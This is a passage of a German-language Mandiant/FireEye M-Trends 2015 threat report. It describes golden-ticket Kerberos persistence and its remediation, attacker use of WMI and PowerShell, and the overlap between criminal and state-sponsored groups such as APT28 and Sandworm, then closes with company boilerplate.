https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_ Analysis_of_Malicious_SSP.pdf verfügbar.
  21. 21. www.mandiant.com 19 Dieses sogenannte „goldene Ticket“ kann offline erstellt werden und eine unbegrenzte Gültigkeits- dauer haben. Mit einem solchen Ticket kann der Angreifer auf jedes Konto in der Domäne zugreifen, auch nachdem das entsprechende Kennwort geändert wurde. Ein Angreifer mit einem „goldenen Ticket“ kann also erneut in eine einmal gehackte Umge- bung eindringen und sich sofort wieder Administra- torprivilegien verschaffen, selbst nachdem der ursprüng­liche Angriff abgewehrt, alle Kennwörter geändert und die vom Hacker vorgenommenen Änderungen rückgängig gemacht wurden. Um ein System nach einem Angriff mit einem „gol­ denen Ticket“ erneut zu sichern, muss das Kenn­ wort für das Servicekonto krbtgt zweimal hinter­ einander geändert werden. Dieses Konto wird in Kerberos für die Authentifizierung und Schlüssel­ verteilung verwendet. Beim zweimaligen Ändern des Kennworts werden die Kennwort-Historie des Kontos gelöscht und alle vorhandenen Kerberos- Tickets annulliert. Navigation mit WMI und PowerShell In der Vergangenheit mussten Angreifer eine Kom- bination aus Windows-Funktionen wie net und at, speziell erstellter Malware, Batchdateien oder VBS- Skripte und Administratortools wie PsExec nutzen, um eine Windows-Umgebung auszuspio­nieren und dort Befehle auszuführen. Diese Methoden waren bewährt und bequem, hinterließen jedoch Spuren, die bei einer forensischen Analyse ausgewertet werden konnten. In den Jahren 2013 und 2014 stiegen mehrere der von uns beobachteten APT-Gruppen auf völlig neue Navigationsmethoden um. Diese Gruppen nutzen nun häufiger WMI und PowerShell, um Windows- Umgebungen auszuspionieren, Anmel­dedaten zu stehlen und für sie nützliche Daten zu finden. Seit einigen Jahren wird PowerShell auch von zahl- reichen Informationssicherheitsspezialisten und als Bestandteil von Tools für Penetrations­tests genutzt. Aufgrund dessen sind nun mehr Informationen und Quellcode öffentlich zugänglich, sodass Angreifer und Verteidiger sich besser informieren können. Oben wurde beschrieben, wie Angreifer WMI- Ereignisse nutzen, um sich dauerhaften Zugang zu gehackten Umgebungen zu verschaffen. Darüber hinaus nutzen Angreifer auch das Befehlszeilentool wmic.exe, das die Funktionen von WMI auf Shells und Skripte ausdehnt. Mit WMI können Angreifer sich per Fernzugriff Zugang zu Systemen verschaf- fen, Änderungen in der Registry vornehmen, auf Logdateien zugreifen und natürlich Befehle aus- führen. Bis auf die Anmeldung lassen per Fernzu- griff ausgeführte WMI-Befehle kaum Spuren auf den betroffenen Systemen zurück. In mehreren der von uns 2014 untersuchten Fälle nutzten Angreifer per Fernzugriff gestartete Pow- erShell-Befehle und -Skripte, die vollständig im Ar- beitsspeicher ausgeführt wurden, um Umgebungen auszuspionieren und Anmeldedaten zu stehlen. Da der PowerShell-Code vollständig im Arbeitsspei­ cher ausgeführt wird, hinterlässt er keine Spuren auf der Festplatte, was die Analyse dieser Vorfälle deutlich erschwert. In den meisten Umgebungen ist standardmäßig eine ältere Version von PowerShell installiert, doch auch diese kann keinen detaillierten Audit-Trail des ausgeführten Quellcodes aufzeich- nen. Fazit: Technisch versierte Angreifer entwickeln ihre Tools und Methoden ständig weiter, um so wenig forensisch auswertbare Spuren zu hinterlassen wie möglich und dadurch länger unentdeckt zu bleiben. Deshalb müssen Unternehmen in der Lage sein, die Aktivitäten auf allen Systemen, Protokollquellen und Netzwerkgeräten in ihrer Infrastruktur sowohl in Echtzeit zu überwachen als auch rückblickend foren­ sisch zu analysieren. Um Angreifern einen Schritt voraus zu sein, müssen die IT- Sicherheitsverantwortlichen in Unternehmen mit dem Muster der normalen Aktivi­ täten vertraut sein und alle Abweichungen von diesem Muster untersuchen.
  22. 22. 20 www.mandiant.com Ein Bericht von der CyberfrontM-Trends I m Verlauf des Jahres 2014 konnten wir mehrere Angriffe zu russischen Hackern zurückverfolgen, stießen dann jedoch auf eine Grauzone, in der es sehr schwierig war, zu entscheiden, ob es sich um eine kriminelle Bande oder einen staatlichen An- greifer handelte. Da die verwendeten Tools und Methoden kaum noch voneinander zu unterschei­ den sind, müssen die Analysten die Absichten des Angreifers untersuchen, um die potenziellen Aus- wirkungen eines Angriffs richtig einschätzen zu können. Einige Gruppen, deren Aktivitäten wir beobachten, greifen gezielt Unternehmen im Finanzwesen an, nutzen dazu aber Methoden, die größere Ähnlich- keiten mit staatlich gesponserten APT-Aktivitäten aufweisen als mit den Aktivitäten gewöhnlicher, finan­ziell motivierter Krimineller. Abbildung 10 auf Seite 21 zeigt, wie die von uns 2014 untersuchten Angriffe bekannter APT-Gruppen und gewöhnli- cher Internetkrimineller einander in verschiedenen Bereichen überlappen. Im Zeichen der Unsicherheit die Absicht durchschauen – kein leichtes Unterfangen Aufgrund dieser Überlappungen ist es wichtig, dass Sicherheitsspezialisten bei der Untersuchung un- voreingenommen vorgehen und nicht anhand einer Methode oder eines verwendeten Tools vorschnell Rückschlüsse auf den Angreifer und seine Absich­ ten ziehen. Die Aktivitäten einer von uns beobach­ teten, in Russland ansässigen Hackergruppe im Jahr 2014 sind ein gutes Beispiel dafür, warum es so schwierig ist, die Ziele eines Angreifers zu durch- schauen und warum dieses Wissen für die Deutung des Angriffsverlaufs wichtig ist. Im Oktober 2014 beschrieben wir die Aktivitäten von APT28. Wir sind der Überzeugung, dass diese Hackergruppe im Auftrag der russischen Regierung vertrauliche politische und militärische Daten stiehlt. APT28 griff mehrere Jahre lang Rüstungs- firmen, militärische Einrichtungen, sowie staatliche und zwischenstaatliche Organisationen an. Andere Forscher entlarvten eine weitere in Russ- land ansässige Angreifergruppe, die anscheinend ebenfalls im Auftrag der russischen Regierung spio- niert. Diese zweite Gruppe wird von verschiedenen Forschern als „Sandworm Team,“9 , „Quedagh“10 oder „BE2 APT“11 bezeichnet.. Trend Nr. 4: Die Grenzen verschwimmen – Kriminelle und APT-Actors imitieren einander Unsere Untersuchungen im Jahr 2014 haben bestätigt, dass sich ein neuer Trend abzeichnet: Internetkriminelle eignen sich Taktiken an, die von APT-Actors ent­ wickelt wurden, während APT-Actors oft dieselben Tools nutzen wie gewöhnliche Internetkriminelle. Da die verwendeten Taktiken kaum noch voneinander zu un- terscheiden sind, müssen Analysten die Ziele der Angreifer verstehen, um die Aus- wirkungen eines Angriffs abschätzen zu können und eine Sicherheitsstrategie zu erstellen, die auf die vorhandenen Risiken abgestimmt ist. 9 iSight Partners, „Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day“, 14. Oktober 2014, online, aufgerufen am 2. Dezember 2014 10 https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf 11 https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/
  23. 23. www.mandiant.com 21 12 https://www.fireeye.com/blog/threat-research/2014/04/crimeware-or-apt-malwares-fifty-shades-of-grey.html 13 APT18 ist eine in China ansässige Hackergruppe, siehe https://www2.fireeye.com/WBNR-14Q3HealthcareWebinar.html. Angriffsart oder -merkmal Beispiele ähnlicher Nutzung durch kriminelle und staatlich gesponserte Angreifer Social Engineering Social Engineering ist kein Alleinstellungsmerkmal von APT-Gruppen mehr. Im Jahr 2014 verschickten mehrere finanziell motivierte Angreifergruppen Spear-Phishing-E-Mails, sowohl als ersten Angriffs­ vektor als auch in wiederholten Versuchen, sich nach der Abwehr eines Angriffs erneut Zugang zum Netzwerk des Opfers zu verschaffen. Die genutzten Phishing-E-Mails wurden dabei individuell auf die Empfänger abgestimmt. Interaktives Social Engineering wird ebenfalls von beiden Angreifertypen eingesetzt. In einem von uns untersuchten Vorfall erstellten die finanziell motivierten Angreifer Profile in beliebten sozialen Netz­ werken und nahmen Kontakt mit den Mitarbeitern des Zielunternehmens auf, um sie zum Herunter- laden von Backdoors zu bewegen. Auch APT3, ein vermutlich staatlich gesponserter Angreifer, nutzte einen weiblichen Avatar in einem beliebten sozialen Netzwerk, um mit einem Mitarbeiter eines Zielun- ternehmens in Kontakt zu treten. Nachdem „sie“ drei Wochen lang Nachrichten mit dem Mitarbeiter ausgetauscht hatte, schickte „sie“ einen Lebens­lauf an seine persönliche E-Mail-Adresse, der eine von APT3 entwickelte Backdoor enthielt. In gezielten Fragen an andere Mitarbeiter des Unternehmens versuchte „sie“ außerdem, den Namen des IT-Managers und Einzelheiten über die verwendeten Soft- wareversionen in Erfahrung zu bringen. Speziell erstellte Malware und Tools Das Erstellen eigener, auf bestimmte Situationen zugeschnittener Tools wurde sowohl bei APT-Actors als auch bei finanziell motivierten Internetkriminellen beobachtet. In einem Fall hatten Internetkrimi- nelle mehrere Jahre lang Zugang zur Infrastruktur eines Opfers. In dieser Zeit entwickelten und nutzten sie über 60 verschiedene Varianten von Malware und Tools. Die in Russland ansässige Gruppe APT28 entwickelt ihre Malware seit über sieben Jahren systematisch weiter und erstellt Malware-Plattformen, die flexibel genug sind, um in infiltrierten Umgebungen langfristig unerkannt zu bleiben. Crimeware Als Crimeware bezeichnen wir Malware-Toolkits, die kostenlos oder auf dem Schwarzmarkt erhältlich sind. Sie werden nicht nur von finanziell motivierten Internetkriminellen genutzt. Eine vermutlich in Russ­land ansässige APT-Gruppe nutzte Zero-Day-Angriffe, um Varianten von BlackEnergy zu installie- ren. Das Toolkit BlackEnergy ist bei Internetkriminellen seit Jahren sehr beliebt. Auch viele Remote- Access-Tools werden sowohl von APT-Actors als auch von Internetkriminellen genutzt.12 Deshalb reicht eine Analyse der genutzten Tools allein nicht aus, um die Angriffsart zu bestimmen. Lange Verweildauer in einer gehackten Infrastruktur Die Zeit, in der finanziell motivierte Internetangriffe in puncto Geschwindigkeit und Brutalität durchaus mit einem Banküberfall vergleichbar waren, ist vorbei. Eine lange Verweildauer in einer infizierten Um­ gebung war früher ein Anzeichen für einen APT-Initiator, der einen komplexeren Auftrag zu erfüllen hat. Inzwischen haben jedoch auch finanziell motivierte Hacker gezeigt, dass sie sich unauffällig verhalten können. In einem Fall nutzten Internetkriminelle bekannte Speicherorte für das Systemstartverzeichnis, um ihre Malware zu starten. In einem anderen Fall hatten finanziell motivierte Hacker über fünf Jahre lang Zugriff auf die Infrastruktur ihres Opfers, bevor ihre Aktivitäten bemerkt wurden. Wir haben sogar hartnäckige finanziell motivierte Angreifer beobachtet, die versuchten, erneut in eine Umgebung einzu­ dringen, aus der sie entfernt worden waren. Datendiebstahl Der Datendiebstahl breitet sich aus, nicht nur hinsichtlich des Volumens und der Art der gestohlenen Daten, sondern auch hinsichtlich der Akteure. Das bevorzugte Ziel sind weiterhin große Verzeichnisse personenbezogener Daten. Finanziell motivierte Kriminelle stehlen solche Daten für Betrugsversuche oder um sie auf dem Schwarzmarkt zu verkaufen. Inzwischen sind jedoch auch andere Angreifer an personenbezogenen Daten interessiert. Sie verfolgen dabei jedoch keine finanziellen Ziele. Wir haben beispielsweise beobachtet, dass APT18 und andere APT-Gruppen personenbezogene Daten stehlen – ein bislang völlig untypisches Verhalten für diesen Angreifertyp.13 Abbildung 10: Ähnlichkeiten im Vorgehen von APT-Gruppen und Internetkriminellen
  24. 24. 22 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Diese Gruppe schien es auf ähnliche Ziele abgese­ hen zu haben wie APT28, es gab jedoch einige wich- tige Unterschiede. Zum einen nutzte die Gruppe Zero-Day-Schwachstellen und Schwarzmarkt- Malware. Zum anderen gibt es Anzeichen dafür, dass sie kritische Infrastruktureinrichtungen in den USA angriff.14, 15 Eine Analyse der bei diesen Angriffen genutzten Malware und Infrastruktur ergab, dass das Sand- worm-Team das Toolkit BlackEnergy16 nutzte, um Ziele in der Ukraine anzugreifen. Das würde die an- haltenden Spannungen zwischen der Ukraine und Russland widerspiegeln. Manchen Berichten zu- folge soll dieselbe Gruppe das Toolkit BlackEnergy auch zu Angriffen auf SCADA-Systeme (Superviso- ry Control and Data Acquisition) benutzt haben.17 Bei den angegriffenen Systemen handelte es sich um Produktionssysteme in verschiedenen Branchen, und nicht um herstellerspezifische Prototypen oder Netzwerke, in denen vertrauliche Finanzdaten oder geistiges Eigentum gespeichert oder übertragen werden. Deshalb liegt die Vermutung nahe, dass die Angreifer Schwach­stellen auskundschaften wollten, die in Sabotage​versuchen ausgenutzt werden könn­ ten. Durch die Nutzung gängiger Schwarzmarkt- tools wie BlackEnergy wollten die Angreifer ver- mutlich ihre Anonymität wahren und bei Bedarf glaubhaft abstreiten können, etwas mit diesem An- griff zu tun gehabt zu haben. Welche Rolle spielen diese Unterschiede? In der Sicherheitsbranche ist umstritten, wie wich­ tig es ist, die Ziele eines Angreifers zu erkennen oder herauszufinden, welcher Hacker oder welche Gruppe hinter einem bestimmten Angriff steckt. Manche Forscher sind der Meinung, dass die Iden- tität des Angreifers unter dem Gesichtspunkt der Netzwerksicherheit keine Rolle spielt. Wichtig ist, dass der Angriff abgewehrt, die Schäden beseitigt und Wiederholungen verhindert werden. Zudem wird es durch die einander überlappenden Tools und Taktiken von finanziell motivierten Krimi- nellen und APT-Actors auch immer schwieriger, Fragen hinsichtlich der Absichten und potenziellen Auswirkungen zu beantworten. Auch die Täu­ schungsmanöver und Lügen der Angreifer, die un- terschiedliche Verfolgung von Straftaten in ver- schiedenen Ländern und die äußerst komplizierten Beziehungen zwischen korrupten Regierungsbeam- ten und dem kriminellen Untergrund tragen zur Undurchsichtigkeit der Situation bei. Doch das Durchschauen der Absichten und Beweg- gründe eines Angreifers kann einen Anhaltspunkt dafür geben, wie ein Angriff am besten abgewehrt werden kann. Ein typisches Beispiel ist das bereits erwähnte Sandworm-Team, das vermutlich im Auf- trag der russischen Regie­rung Spionage betreibt und mithilfe gängiger Schwarzmarkt-Malware ver- sucht, Zugang zu kritischen Infrastruktureinrich- tungen in den USA zu erlangen. Obwohl die genutz- ten Tools aus technischer Sicht nichts Besonderes sind, wäre es ein großer Fehler, diese Angriffe wie die nahezu alltäglichen Angriffe der „kleinen Fische“ unter den Internetkriminellen zu behandeln. Wenn Sie wüssten, dass die Malware in Ihrem Netz­ werk nur die erste Etappe eines staatlich beauftrag­ ten Angriffs ist, würden Sie sicher anders darauf re- agieren als auf eine Infektion mit Malware, die von Opportunisten in einem breit gestreuten Angriff eingeschleust wurde. Auch bei einem Diebstahl personenbezogener Daten hängt die Reaktion da­ von ab, ob die Diebe gewöhnliche Kriminelle sind, die sich „nur“ auf Ihre Kosten bereichern wollen, oder ob die Daten aus schwerer durchschaubaren Gründen im Auftrag einer Regierung gestohlen wurden. 14 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ 15 https://www.virusbtn.com/conference/vb2014/abstracts/LM3-LipovskyCherepanov.xml 16 BlackEnergy ist ein erweiterbares Framework, das Hacker mithilfe einer Sammlung aus DLL-Dateien (Dynamic Link Libraries) durch die gewünschten Funktionen ergänzen können. Jedes DLL-Plugin kann für einen bestimmten Zweck geschrieben oder modifiziert und als verschlüsselte Datei gespei- chert werden. In ihrer verschlüsselten Form sehen die DLL-Dateien alle gleich aus und lassen keine Rückschlüsse auf die Absichten des Angreifers zu. Bislang wurde BlackEnergy hauptsächlich für DDoS-Angriffe (Distributed Denial of Service, verteilte Dienstblockade) verwendet, siehe http://at- las-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf; http://blogs.mcafee.com/business/security-connected/evolving-ddos-botnets-1- blackenergy) 17 http://blog.trendmicro.com/trendlabs-security-intelligence/sandworm-to-blacken-the-scada-connection/ Fazit: Da die Tools, Methoden und Vorgehensweisen von Internetkriminellen und APT-Actors einander immer mehr ähneln, gewinnt die Analyse der Ziele und Beweg­ gründe der Angreifer an Bedeutung. Nur so können Sie die potenziellen Auswirkun­ gen eines Angriffs auf Ihre Infrastruktur richtig einschätzen, angemessen reagieren und eine Sicherheitsstrategie entwickeln, die auf die tatsächlich bestehenden Be­ dro­hungen abgestimmt ist.
  25. 25. www.mandiant.com 23 D as Thema Cybersecurity interessiert in­ zwischen ein breites Publikum. Angesichts dieser Tatsache sollten Einbrüche in die In- frastruktur des eigenen Unternehmens nicht mehr als etwas betrachtet werden, vor dem man sich fürchtet oder für das man sich schämen muss. An- griffe dieser Art sind inzwischen Teil der geschäftli- chen Realität. Deshalb gilt es, sich auf sie vorzube­ reiten und selbstsicher auf sie zu reagieren. Eine solche Selbstsicherheit setzt einen neuen An- satz für die Cybersecurity voraus. Niemand kann jeden Angriff abwehren. Doch wenn Sie die raffi­ niertesten Bedrohungen schnell und effektiv auf- decken, analysieren und angemessen auf sie reagie- ren, können Sie Ihr Unternehmen, Ihre Kunden und Ihre Partner vor Konsequenzen bewahren, die Schlagzeilen machen. Sicherheitsmaßnahmen sind nie perfekt und nie- mand kann jede neue Angriffsmethode vorherse­ hen. Auch 2014 wurde wieder deutlich, dass kein Internetkrimineller aufgibt, nur weil ein Angriff durch ein neues Sicherheitstool vereitelt wurde. Doch mit der richtigen Kombination aus Technik, Informationen und Sachkenntnis können Sie die Lücken in Ihren Sicherheitsvorkehrungen schließen. Sie können Ihre Sicherheitsmaß­nahmen ständig weiterentwickeln, um neuen Bedrohungen, neuen Tools und neuen Angriffsmaschen gewachsen zu sein und Ihr Netzwerk zu schützen. Die Angreifer sind intelligent, gut ausgerüstet und hartnäckig. Es gibt keinen Grund, warum dies nicht auch auf die Verteidiger zutreffen sollte. Schlussfolgerung Auch 2014 entwickelten die Hacker sich weiter und fanden neue Methoden, um den Kreis ihrer Opfer auszuweiten. Doch in einem wichtigen Punkt blieb alles beim Alten: Zu viele Unternehmen waren nicht auf den früher oder später unvermeidli- chen Angriff vorbereitet, sodass die Eindringlinge viel zu lange unbemerkt blieben.
  26. 26. 24 www.mandiant.com Ein Bericht von der CyberfrontM-Trends Über Mandiant Mandiant, ein Tochterunternehmen von FireEye, hat die Computernetzwerke und Endpunkte von Hunder- ten von Unternehmen in allen wichtigen Branchen von Eindringlingen befreit und gegen erneute Angriffe gesichert. Mandiant ist der bevorzugte Partner für Fortune-500-Unternehmen und Behörden, die kritische Sicherheitsverletzungen aller Art verhindern oder angemessen auf sie reagieren möchten. Mandiant Securi- ty Consulting Services nutzen Bedrohungsdaten und Technik von FireEye, um die Opfer von Cyberangriffen beim Kampf gegen die Angreifer und der erneuten Sicherung ihrer Netzwerke zu unterstützen. Über FireEye FireEye schützt die wertvollsten Ressourcen weltweit vor Internetangriffen. Unsere Kombination aus Tech­ nik, Wissen, Expertise und einem äußerst reaktionsschnellen Notfallteam trägt dazu bei, die Auswirkungen von Angriffen zu mindern. Wir entlarven und stoppen Angreifer in jeder Phase eines Angriffs und decken Angriffe auch im frühesten Stadium auf. Mit unserer Hilfe können Sie ermitteln, welchem Risiko Ihre wert­ vollsten Ressourcen bei einem Angriff ausgesetzt wären. Darüber hinaus unterstützen wir Sie dabei, sich für die schnelle und erfolgreiche Abwehr von Angriffen zu rüsten. Die weltweite Gemeinschaft von FireEye für die Cybersecurity umfasst über 2.700 Kunden in 67 Ländern, darunter mehr als 157 Fortune-500-Unter­ nehmen.
  27. 27. Mandiant, ein Tochterunternehmen von FireEye®  | (+1) 703.683.3141 | (+1) 800.647.7020 | info@mandiant.com | www.mandiant.com © 2015 FireEye, Inc. Alle Rechte vorbehalten. Mandiant und das M-Logo sind eingetragene Marken von FireEye, Inc. Alle anderen Marken, Produkte oder Servicenamen sind möglicherweise eingetragene Marken oder Servicemarken ihrer jeweiligen Inhaber. RPT.MTRENDS.DE-DE.022415 A FireEye® Company

×